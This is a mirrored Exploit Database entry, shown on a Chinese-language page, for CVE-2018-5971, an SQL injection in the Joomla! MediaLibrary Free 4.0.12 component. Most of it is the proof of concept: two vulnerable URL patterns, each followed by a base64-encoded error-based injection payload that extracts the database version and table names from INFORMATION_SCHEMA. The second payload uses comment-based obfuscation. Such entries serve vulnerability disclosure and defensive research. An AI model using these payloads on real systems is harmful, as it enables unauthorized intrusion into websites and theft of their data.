Joomla! Component MediaLibrary Free 4.0.12 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： Ihsan Sencan
  日期： 2018-02-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44122/

• # # # # 
  # Exploit Title: Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
  # Dork: N/A
  # Date: 16.02.2018
  # Vendor Homepage: http://ordasoft.com/
  # Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
  # Software Download: http://ordasoft.com/All-Download/Download-document/173-Media-Library-basic-2.1.html
  # Version: 4.0.12
  # Category: Webapps
  # Tested on: WiN7_x64/KaLiLinuX_x64
  # CVE: CVE-2018-5971
  # # # #
  # Exploit Author: Ihsan Sencan 
  # # # #
  # 
  # POC:
  # 
  # 1)
  # http://localhost/[PATH]/index.php?option=com_medialibrary&task=view_author&id=[SQL]
  # MStBTkQoU0VMRUNUKzErRlJPTShTRUxFQ1QrQ09VTlQoKiksQ09OQ0FUKChTRUxFQ1QrKFNFTEVDVCtDT05DQVQoQ0FTVChWRVJTSU9OKCkrQVMrQ0hBUiksMHg3ZSkpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUytMSU1JVCswLDEpLEZMT09SKFJBTkQoMCkqMikpeCtGUk9NK0lORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMrR1JPVVArQlkreClhKStBTkQrMT0x
  # 
  # 2)
  # http://localhost/[PATH]/index.php/component/medialibrary/0/lend_request?Itemid=0&mid[0]=[SQL]
  # NjMgQW5EKygvKiE0NDQ1NXNFbGVDVCovKzB4MzErLyohNDQ0NTVGck9NKi8rKC8qITQ0NDU1c0VsZUNUKi8rY09VTlQoKiksLyohNDQ0NTVDb05DQXQqLygoLyohNDQ0NTVzRWxlQ1QqLygvKiE0NDQ1NXNFbGVDVCovKy8qITQ0NDU1Q29OQ0F0Ki8oY0FzdChkQVRBQkFTRSgpK0FzK2NoYXIpLDB4N2UpKSsvKiE0NDQ1NUZyT00qLytpbmZPck1hdGlvbl9zY2hFbWEudGFibGVzKy8qITQ0NDU1V2hlckUqLyt0YWJsZV9zY2hlbWE9ZEFUQUJBU0UoKStsaW1pdCswLDEpLGZsb29yKHJhTkQoMCkqMikpeCsvKiE0NDQ1NUZyT00qLytpbmZPck1hdGlvbl9zY2hFbWEudEFCTEVTKy8qITQ0NDU1Z1JPVVAqLytiWSt4KWEpK2FORCsxPTE=
  # 
  # # # #